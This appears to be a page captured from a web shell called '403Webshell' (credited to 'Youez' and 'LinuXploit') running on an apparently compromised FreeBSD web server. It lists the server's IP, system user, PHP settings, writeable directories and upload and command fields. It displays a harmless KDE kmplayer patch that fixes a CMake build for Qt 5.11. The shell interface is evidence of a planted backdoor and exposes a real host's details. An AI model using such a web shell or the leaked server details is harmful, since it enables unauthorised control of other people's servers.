403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/multimedia/kmplayer/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/multimedia/kmplayer/files/patch-git_7dafda
From 7dafda636033d23436ea72c45967af78f54d76fb Mon Sep 17 00:00:00 2001
From: Andreas Sturmlechner <asturm@gentoo.org>
Date: Tue, 17 Apr 2018 12:07:04 +0200
Subject: Fix build with Qt 5.11_beta3 (dropping qt5_use_modules)

Test Plan: Built fine with Qt 5.11_beta3.

Reviewers: pino, vriezen

Differential Revision: https://phabricator.kde.org/D12272
---
 src/CMakeLists.txt | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/src/CMakeLists.txt b/src/CMakeLists.txt
index f675d9a..57af1ed 100644
--- src/CMakeLists.txt
+++ src/CMakeLists.txt
@@ -161,9 +161,9 @@ qt5_add_dbus_adaptor(kphononplayer_SRCS org.kde.kmplayer.streamslave.xml
 
 add_executable(kphononplayer ${kphononplayer_SRCS})
 
-qt5_use_modules(kphononplayer Core DBus Widgets X11Extras)
-
-target_link_libraries(kphononplayer Phonon::phonon4qt5 ${XCB_LIBRARIES})
+target_link_libraries(kphononplayer Phonon::phonon4qt5 ${XCB_LIBRARIES}
+    Qt5::Core Qt5::DBus Qt5::Widgets Qt5::X11Extras
+)
 
 install(TARGETS kphononplayer ${INSTALL_TARGETS_DEFAULT_ARGS})
 
-- 
cgit v1.1


Youez - 2016 - github.com/yon3zu
LinuXploit